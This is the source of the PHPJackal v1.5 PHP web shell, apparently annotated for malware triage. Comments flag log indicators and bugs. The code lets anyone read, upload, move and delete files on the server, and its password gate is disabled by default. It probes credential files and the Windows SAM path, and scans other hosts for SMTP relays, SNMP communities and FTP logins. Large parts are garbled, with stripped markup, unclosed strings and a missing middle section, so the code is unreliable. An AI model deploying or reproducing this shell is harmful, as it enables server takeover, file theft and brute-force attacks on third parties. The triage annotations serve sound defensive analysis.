#--Config--#
// Operator-chosen access password. The gate further down only runs when this
// value is non-empty (`if(!empty($login_password))`), so the default of ''
// leaves every request handler in the file reachable without authentication.
$login_password= ''; //Set password
#----------#
// Runtime setup: report all errors, remove the execution-time limit and raise
// the memory ceiling to 9999M so long-running requests are not stopped by the
// host's PHP defaults.
// Triage note: a single PHP file that lifts its own resource limits and then
// dispatches on request parameters deserves a close look when found in a web root.
error_reporting(E_ALL);
set_time_limit(0);
ini_set("max_execution_time","0");
ini_set("memory_limit","9999M");
// Legacy call: set_magic_quotes_runtime() was removed in PHP 7.0 and
// get_magic_quotes_gpc() (below) in PHP 8.0, so this preamble targets PHP 4/5.
set_magic_quotes_runtime(0);
// Fallback to the pre-4.1 long superglobal arrays when the short ones are missing.
if(!isset($_SERVER))$_SERVER = &$HTTP_SERVER_VARS;
if(!isset($_POST))$_POST = &$HTTP_POST_VARS;
if(!isset($_GET))$_GET = &$HTTP_GET_VARS;
if(!isset($_COOKIE))$_COOKIE=$HTTP_COOKIE_VARS;
// $_REQUEST is rebuilt from GET and POST only (cookies excluded); on a key
// collision the POST value wins. Every handler below therefore accepts its
// parameters from either the query string or the request body, so query-string
// logging alone will not show POSTed parameters.
$_REQUEST = array_merge($_GET, $_POST);
// Undo magic-quotes escaping so request values are used exactly as sent.
// NOTE(review): assumes every value is a scalar; an array-valued parameter
// would be handed to stripslashes() as-is.
if (get_magic_quotes_gpc()){
foreach ($_REQUEST as $key=>$value)
{
$_REQUEST[$key]=stripslashes($value);
}
}
/**
 * Build a link back to the current script.
 *
 * Starts from $_SERVER['PHP_SELF'], re-appends every current GET parameter
 * except (a) the action parameters listed in $actionParams and (b) any name
 * that $str sets again, then appends $str itself.
 *
 * Names and values are concatenated as-is: nothing is URL-encoded or
 * HTML-escaped here, so whatever the caller does with the result (header,
 * markup) receives raw request data.
 *
 * @param string $str Query-string fragment ("a=1&b=2") to append.
 * @return string Script path, "?", the carried-over parameters, then $str.
 */
function hlinK($str=""){
    // Action parameters that must not leak from one request into the next link.
    $actionParams = array('workingdiR','urL','imagE','namE','filE','downloaD','seC','cP','mV','rN','deL');

    // Parameter names that $str is about to set; those win over the current GET values.
    $overridden = array();
    foreach (explode("&", $str) as $pair) {
        $pieces = explode("=", $pair);
        $overridden[] = $pieces[0];
    }

    $link = $_SERVER['PHP_SELF']."?";
    foreach ($_GET as $name => $value) {
        $replaced = false;
        foreach ($overridden as $candidate) {
            // Loose comparison kept on purpose: numeric GET keys arrive as ints.
            if ($candidate == $name) {
                $replaced = true;
                break;
            }
        }
        if ($replaced || in_array($name, $actionParams)) {
            continue;
        }
        $link .= $name."=".$value."&";
    }

    return $link.$str;
}
// Access gate. Runs only when a password was configured at the top of the file.
if(!empty($login_password)){
// Login submission: the `fpassw` request field is compared to the configured
// password with loose `==`. On a match the `passw` cookie is set to the MD5 of
// the submitted password; setcookie() is called with name and value only, so
// no expiry, path or flags are specified.
if(!empty($_REQUEST['fpassw'])){
if($_REQUEST['fpassw']==$login_password)setcookie('passw',md5($_REQUEST['fpassw']));
// Redirect back to the script. No exit follows, so execution continues into
// the cookie check below within the same request.
@header("Location: ".hlinK());
}
// Session check: the request is stopped with the password prompt unless the
// `passw` cookie equals md5($login_password) (loose `!=`).
// Triage note: the cookie is an unsalted MD5 of the password itself, so its
// value is identical on every login — a cookie named `passw` carrying a
// 32-hex-digit value is a stable indicator in proxy or WAF logs.
// NOTE(review): the prompt text inside die() looks like a login form whose
// markup was stripped in this copy — confirm against an intact sample.
if(empty($_COOKIE['passw']) || $_COOKIE['passw']!=md5($login_password))die("

 
Password:
 

");
}
// The working directory is switched to the request-supplied `workingdiR`
// without validation, and the return value of chdir() is not checked. Relative
// paths used by the handlers that follow resolve against this directory.
if (!empty($_REQUEST['workingdiR'])) chdir($_REQUEST['workingdiR']);
/**
 * Outbound reachability probe used by the scanner code further down the file
 * (called there for ports 25, 161 and 21).
 *
 * Triage note: these connections originate from the web-server process, so
 * egress logs showing the PHP/web-server account opening SMTP, SNMP or FTP
 * sessions to many hosts are the network-side trace of this function.
 *
 * @param string $ip      Target host passed to fsockopen().
 * @param int    $port    Target port.
 * @param int    $timeout Seconds: connect timeout (TCP) or read timeout (UDP).
 * @param int    $type    Falsy selects the TCP branch, truthy the UDP branch.
 * @return int 1 when the probe counts the port as reachable, otherwise 0.
 */
function checkthisporT($ip,$port,$timeout,$type=0){
// TCP: a successful connect within $timeout is the whole test.
if(!$type){
$scan=@fsockopen($ip,$port,$n,$s,$timeout);
if($scan){fclose($scan);return 1;}
}
// UDP: only attempted when socket_set_timeout() exists; otherwise falls through to 0.
elseif(function_exists('socket_set_timeout')){
$scan=@fsockopen("udp://".$ip,$port);
if($scan){
socket_set_timeout($scan,$timeout);
// One null byte is sent, then a one-byte read is timed.
@fwrite($scan,"\x00");
$s=time();
fread($scan,1);
// The port is reported as reachable only when the read lasted at least
// $timeout seconds; a read that returns sooner yields 0.
// NOTE(review): on that early-return path the handle is never fclose()d.
if((time()-$s)>=$timeout){fclose($scan);return 1;}
}
}
return 0;
}
// Compatibility shim: defines file_get_contents() only on interpreters that
// lack it. The built-in has existed since PHP 4.3, so on any current runtime
// this branch never executes.
if (!function_exists("file_get_contents")){
// Reads $addr and returns what was read.
// NOTE(review): filesize() is given the handle $a instead of the path $addr,
// and the handle is read and closed before the `if($a)` success check, so a
// failed fopen() would still reach fread()/fclose(). Nothing is returned
// explicitly when the open fails.
function file_get_contents($addr){
$a = fopen($addr,"r");
$tmp = fread($a,filesize($a));
fclose($a);
if($a)return $tmp;
}
}
// Same kind of shim for file_put_contents() (built in since PHP 5.0).
if (!function_exists("file_put_contents")){
// Truncates/creates $addr, writes $con and returns strlen($con); returns 0
// when the file cannot be opened. The fwrite() result itself is not checked,
// so a short write is still reported as the full length.
function file_put_contents($addr,$con){
$a = fopen($addr,"w");
if(!$a)return 0;
fwrite($a,$con);
fclose($a);
return strlen($con);
}
}
/**
 * Push pending output to the client immediately.
 *
 * Calls flush() and then ob_flush(); the latter is silenced with `@` because
 * it raises a notice when no output buffer is active. The scanner loops call
 * this after each result so findings are written out as they are produced.
 */
function flusheR(){
    flush();
    @ob_flush();
}
// File download handler. The `downloaD` request parameter is used unmodified
// as the path for file_get_contents(); the only limits are the permissions of
// the PHP process and any open_basedir setting. The script then exits.
// Triage note: this is the file-exfiltration path of the tool. Parameter names
// with a trailing capital (`downloaD`, `imagE`, `workingdiR`) are distinctive
// in access logs when sent via GET; POSTed parameters need body logging.
if (!empty($_REQUEST['downloaD'])){
@ob_clean();
$dl=$_REQUEST['downloaD'];
$con=file_get_contents($dl);
header("Content-type: application/octet-stream");
// The raw parameter value, path included, is interpolated into the header.
header("Content-disposition: attachment; filename=\"$dl\";");
// NOTE(review): a failed read is not detected; the response is then an empty attachment.
header("Content-length: ".strlen($con));
echo $con;
exit;
}
// "Image" handler: returns the content of whatever path `imagE` names, always
// labelled as GIF. No check is made that the path is an image, so it reads any
// readable file just like the download handler. The unusual casing of the
// media type ("imagE/gif") is sent as written and shows up in response headers.
if (!empty($_REQUEST['imagE'])){
$img=$_REQUEST['imagE'];
header("Content-type: imagE/gif");
header("Content-length: ".filesize($img));
header("Last-Modified: ".date("r",filemtime($img)));
echo file_get_contents($img);
exit;
}
// Every other response is marked non-cacheable with a fixed Expires date in
// the past; `@` hides the warning raised when output has already started.
@header("Cache-Control: no-cache, must-revalidate");
@header("Expires: Mon, 7 Aug 1987 05:00:00 GMT");
/**
 * Format a byte count for display.
 *
 * Uses binary multiples (1024-based) and rounds to two decimals; values
 * below 1024 are returned unscaled with a " B" suffix.
 *
 * @param int|float|string $size Size in bytes.
 * @return string For example "512 B", "1.5 KB", "1 MB" or "2.25 GB".
 */
function showsizE($size){
    // Largest unit first so the first threshold reached decides the suffix.
    $units = array(
        " GB" => 1073741824,
        " MB" => 1048576,
        " KB" => 1024,
    );
    foreach ($units as $suffix => $threshold) {
        if ($size >= $threshold) {
            return round(($size / $threshold), 2).$suffix;
        }
    }
    return $size." B";
}
// Platform flag: 1 when the php_uname() string starts with "WIN" (compared
// after upper-casing), otherwise 0. sysinfO() and filemanager() read it via
// `global $windows` to choose between Windows and non-Windows code paths.
if (substr((strtoupper(php_unamE())),0,3)=="WIN") $windows=1; else $windows=0;
$errorbox = "

$et = "

";
$v="1.5";
$msgbox="

$intro="
$footer="${msgbox}PHPJackal v$v - Powered By NetJackal$et";
$hcwd="";
$t = "
 
$crack="  
Dictionary:
Dictionary type: $url
";}
flusheR();
}
elseif(strstr($page,'@ADMINDIRS'))
foreach ($admin as $cg){
$adminch=str_replace('@ADMINDIRS',$cg,$page);
$url="http://$ip$adminch";
$res=check_urL($url,$vuln[3],$vuln[2],$timeout);
if($res){$output=1;echo "$ip)".$vuln[4]." $url
";}
flusheR();
}
elseif(strstr($page,'@USERS'))
foreach ($users as $cg){
$userch=str_replace('@USERS',$cg,$page);
$url="http://$ip$userch";
$res=check_urL($url,$vuln[3],$vuln[2],$timeout);
if($res){$output=1;echo "$ip)".$vuln[4]." $url
";}
flusheR();
}
elseif(strstr($page,'@NUKE'))
foreach ($nuke as $cg){
$nukech=str_replace('@NUKE',$cg,$page);
$url="http://$ip$nukech";
$res=check_urL($url,$vuln[3],$vuln[2],$timeout);
if($res){$output=1;echo "$ip)".$vuln[4]." $url
";}
flusheR();
}
else{
$url="http://$ip$page";
$res=check_urL($url,$vuln[3],$vuln[2],$timeout);
if($res){$output=1;echo "$ip)".$vuln[4]." $url
";}
flusheR();
}
}
}
}
if(!empty($_REQUEST['smtprelay'])){
if(checkthisporT($ip,25,$timeout)){
$res='';
$res=checksmtP($ip,$timeout);
if($res==1){echo "$ip) SMTP relay found.
";$output=1;}flusheR();
}
}
if(!empty($_REQUEST['snmpscanner'])){
if(checkthisporT($ip,161,$timeout,1)){
$com=$_REQUEST['com'];
$coms=$res="";
if(strstr($com,","))$c=explode(",",$com);else $c[0]=$com;
foreach ($c as $v){
$ret=snmpchecK($ip,$v,$timeout);
if($ret)$coms .=" $v ";
}
if ($coms!=""){echo "$ip) SNMP FOUND: $coms
";$output=1;}
flusheR();
}
}
if(!empty($_REQUEST['ftpscanner'])){
if(checkthisporT($ip,21,$timeout)){
$usps=explode(',',$_REQUEST['userpass']);
foreach ($usps as $v){
$user=substr($v,0,strpos($v,':'));
$pass=substr($v,strpos($v,':')+1);
if($pass=='[BLANK]')$pass='';
$ftp=@ftp_connect($ip,21,$timeout);
if ($ftp){
if(@ftp_login($ftp,$user,$pass)){$output=1;echo "$ip) FTP FOUND: ($user:$pass) $ip System type: ".ftp_systype($ftp)."
";}
}
flusheR();
}
}
}
if($output)echo "
";
flusheR();
}
$time=time()-$start;
echo "Done! ($time seconds)";
if(!empty($buglist))unlink($buglist);
}
else{
$chbox=(extension_loaded('sockets'))?"TCPUDP":"";
echo "

$host = substr($host,0,strrpos($host,"."));
echo "
FTP password:
 

";
}
}
function sysinfO(){
global $windows,$disablefunctions,$safemode;
$cwd= getcwd();
$mil=" $basedir=(ini_get("open_basedir") or strtoupper(ini_get("open_basedir"))=="ON")?"ON":"OFF";
if (!empty($_SERVER["PROCESSOR_IDENTIFIER"])) $CPU = $_SERVER["PROCESSOR_IDENTIFIER"];
$osver=$tsize=$fsize='';
if ($windows){
$osver = "  (".shelL("ver").")";
$sysroot = shelL("echo %systemroot%");
if (empty($sysroot)) $sysroot = $_SERVER["SystemRoot"];
if (empty($sysroot)) $sysroot = getenv("windir");
if (empty($sysroot)) $sysroot = "Not Found";
if (empty($CPU))$CPU = shelL("echo %PROCESSOR_IDENTIFIER%");
for ($i=66;$i<=90;$i++){
$drive= chr($i).':\\';
if (is_dir($drive)){
$fsize+=@disk_free_space($drive);
$tsize+=@disk_total_space($drive);
}
}
}else{
$fsize=disk_free_space('/');
$tsize=disk_total_space('/');
}
$disksize="Used spase: ". showsizE($tsize-$fsize) . "   Free space: ". showsizE($fsize) . "   Total space: ". showsizE($tsize);
if (empty($CPU)) $CPU = "Unknow";
$os = php_unamE();
$osn=php_unamE('s');
if(!$windows){
$ker = php_unamE('r');
$o=($osn=="Linux")?"Linux+Kernel":$osn;
$os = str_replace($osn,"${mil}$o\">$osn
",$os);
$os = str_replace($ker,"${mil}Linux+Kernel\">$ker",$os);
$inpa=':';
}else{
$sam = $sysroot."\\system32\\config\\SAM";
$inpa=';';
$os = str_replace($osn,"${mil}MS+Windows\">$osn",$os);
}
$software=str_replace("Apache","${mil}Apache\">Apache",$_SERVER['SERVER_SOFTWARE']);
echo "";
if ($windows){
echo "";
}
else
{
echo "";
}
$uip =(!empty($_SERVER['REMOTE_ADDR']))?$_SERVER['REMOTE_ADDR']:getenv('REMOTE_ADDR');
echo "";if (function_exists('curl_init')) echo "";echo "
if (is_readable('/etc/passwd')) echo "Readable"; else echo'Not readable';echo "
Cpanel log file: ";
if (file_exists("/var/cpanel/accounting.log")){if (is_readable("/var/cpanel/accounting.log")) echo "Readable"; else echo "Not readable";}else echo "Not found";
echo "
${mil}PHP\">PHP version: ".PHP_VERSION." (more...)
Zend version: ";if (function_exists('zend_version')) echo "".zend_version()."";else echo "Not Found";echo "
Include path: ".str_replace($inpa," ",DEFAULT_INCLUDE_PATH)."
PHP Modules: ";$ext=get_loaded_extensions();foreach($ext as $v)echo $v." ";echo "
Disabled functions: ";if(!empty($disablefunctions))echo $disablefunctions;else echo "Nothing"; echo"
Safe mode: $safemode
Open base dir: $basedir
DBMS: ";$sq="";if(function_exists('mysql_connect')) $sq= "${mil}MySQL\">MySQL ";if(function_exists('mssql_connect')) $sq.= " ${mil}MSSQL\">MSSQL ";if(function_exists('ora_logon')) $sq.= " ${mil}Oracle\">Oracle ";if(function_exists('sqlite_open')) $sq.= " SQLite ";if(function_exists('pg_connect')) $sq.= " ${mil}PostgreSQL\">PostgreSQL ";if(function_exists('msql_connect')) $sq.= " mSQL ";if(function_exists('mysqli_connect'))$sq.= " MySQLi ";if(function_exists('ovrimos_connect')) $sq.= " Ovrimos SQL ";if ($sq=="") $sq= "Nothing"; echo "$sq
cURL support: Enabled ";if(function_exists('curl_version')){$ver=curl_version();echo "(Version:". $ver['version']." OpenSSL version:". $ver['ssl_version']." zlib version:". $ver['libz_version']." host:". $ver['host'] .")";}echo "
User information:
IP: $uip
Agent: ".getenv('HTTP_USER_AGENT')."
";
}
function checksuM($file){
global $et;
echo "
}
/**
 * Recursively walk $cwd and print the entries selected by $task, one
 * "[path]" line per hit. Output is echoed directly; nothing is returned.
 *
 * $task values handled by the switch (compared loosely, so the integers 6 and
 * 7 that filemanager() assigns to $_REQUEST['task'] match '6' and '7'):
 *   '0' every file and directory
 *   '1' writable files, plus directories (see note below)
 *   '2' writable files            '3' writable directories
 *   '4' files                     '5' directories
 *   '6' names matching the regular expression in $_REQUEST['search']
 *   '7' names containing the substring in $_REQUEST['search']
 *
 * Triage note: tasks 1 to 3 enumerate writable locations under the starting
 * directory, so a request carrying `task` produces a burst of directory reads
 * across the whole tree from the web-server account.
 *
 * NOTE(review): paths are echoed without HTML escaping; any link markup that
 * surrounded them appears to have been stripped in this copy.
 *
 * @param string     $cwd  Directory to scan.
 * @param int|string $task Filter selector, see above.
 */
function listdiR($cwd,$task){
// NOTE(review): $c is assigned but never used.
$c= getcwd();
// NOTE(review): the opendir() result is not checked and the handle is never
// closed, so every recursion level holds a directory handle open.
$dh = opendir($cwd);
// NOTE(review): the loop condition tests truthiness, so an entry literally
// named "0" ends the listing of that directory early.
while ($cont=readdir($dh)){
if($cont=='.' || $cont=='..')continue;
$adr = $cwd.DIRECTORY_SEPARATOR.$cont;
switch ($task){
case '0':if(is_file($adr))echo "[$adr]\n";if(is_dir($adr))echo "[$adr]\n";break;
// NOTE(review): only the is_file() echo is nested under is_writeable(); the
// is_dir() echo is a separate statement and runs for every directory.
case '1':if(is_writeable($adr))if(is_file($adr))echo "[$adr]\n";if(is_dir($adr))echo "[$adr]\n";break;
case '2':if(is_file($adr) &&  is_writeable($adr))echo "[$adr]\n";break;
case '3':if(is_dir($adr) && is_writeable($adr))echo "[$adr]\n";break;
case '4':if(is_file($adr))echo "[$adr]\n";break;
case '5':if(is_dir($adr))echo "[$adr]\n";break;
// The request value is placed between "@" delimiters and used as a PCRE
// pattern as-is (no preg_quote()); a value containing "@" or an invalid
// pattern makes preg_match() fail with a warning.
case '6':if(preg_match("@".$_REQUEST['search']."@",$cont)){if(is_file($adr))echo "[$adr]\n";if(is_dir($adr))echo "[$adr]\n";}break;
case '7':if(strstr($cont,$_REQUEST['search'])){if(is_file($adr))echo "[$adr]\n";if(is_dir($adr))echo "[$adr]\n";}break;
}
// Recursion re-reads the selector from $_REQUEST['task'] instead of passing
// $task on, so the two can differ if a caller passes another value.
// NOTE(review): is_dir() follows symbolic links; no guard against link loops is visible here.
if (is_dir($adr)) listdiR($adr,$_REQUEST['task']);
}
}
// Fallback stubs for hosts without the POSIX functions: each is defined only
// when the real function is missing and its name does not occur in
// $disablefunctions (set elsewhere in the file, not visible here). Both stubs
// ignore their argument and return 0, so callers get 0 instead of an
// owner/group record. NOTE(review): callers are outside this part of the
// file; presumably the file listing uses them for owner names — confirm.
if (!function_exists("posix_getpwuid") && !strstr($disablefunctions,'posix_getpwuid')) {function posix_getpwuid($u) {return 0;}}
if (!function_exists("posix_getgrgid") && !strstr($disablefunctions,'posix_getgrgid')) {function posix_getgrgid($g) {return 0;}}
function filemanager(){
global $windows,$msgbox,$errorbox,$t,$et,$hcwd;
$cwd= getcwd();
$table = "";
$td1n="
$td2m=" ";
$td1i="
";
$td2i="
";
$tdnr="
";
$tdw="
";
if (!empty($_REQUEST['task'])){
if (!empty($_REQUEST['search'])) $_REQUEST['task'] = 7;
if (!empty($_REQUEST['re'])) $_REQUEST['task'] = 6;
echo "
";

	listdiR($cwd,$_REQUEST['task']);

	echo "
";
}else{
if (!empty($_REQUEST['cP']) || !empty($_REQUEST['mV'])|| !empty($_REQUEST['rN'])){
if (!empty($_REQUEST['cP']) || !empty($_REQUEST['mV'])){
$title="Destination";
$ad = (!empty($_REQUEST['cP']))?$_REQUEST['cP']:$_REQUEST['mV'];
$dis =(!empty($_REQUEST['cP']))?'Copy':'Move';
}else{
$ad = $_REQUEST['rN'];
$title ="New name";
$dis = "Rename";
}
if (!!empty($_REQUEST['deS'])){
echo "
$td1n$td2m$hcwd
}else{
if (!empty($_REQUEST['rN'])) renamE($ad,$_REQUEST['deS']);
else{
copy($ad,$_REQUEST['deS']);
if (!empty($_REQUEST['mV']))unlink($ad);
}
}
}
if (!empty($_REQUEST['deL'])) { if (is_file($_REQUEST['deL'])|| is_link($_REQUEST['deL'])) unlink($_REQUEST['deL']);elseif(is_dir($_REQUEST['deL'])) {
$dh = opendir($_REQUEST['deL']);
$d="";
while ($cont=readdir($dh)){$d++;}
if ($d>2) echo "$errorbox\"".htmlspecialchars($_REQUEST['del'])."\" is not empty!
 

";else rmdir($_REQUEST['del']);}}
if (!empty($_FILES['uploadfile'])){
move_uploaded_file($_FILES['uploadfile']['tmp_name'],$_FILES['uploadfile']['name']);
echo "$msgboxUploaded! File name: ".$_FILES['uploadfile']['name']." File size: ".$_FILES['uploadfile']['size']. "$et
";
}
$select = "
Drives: ";
for ($i=66;$i<=90;$i++){$drive= chr($i).':';
if (is_dir($drive."\\")){$vol=shelL("vol $drive");if(empty($vol))$vol=$drive;echo " $drive\\";}
}
echo $et;
}
echo "$table
 
Location: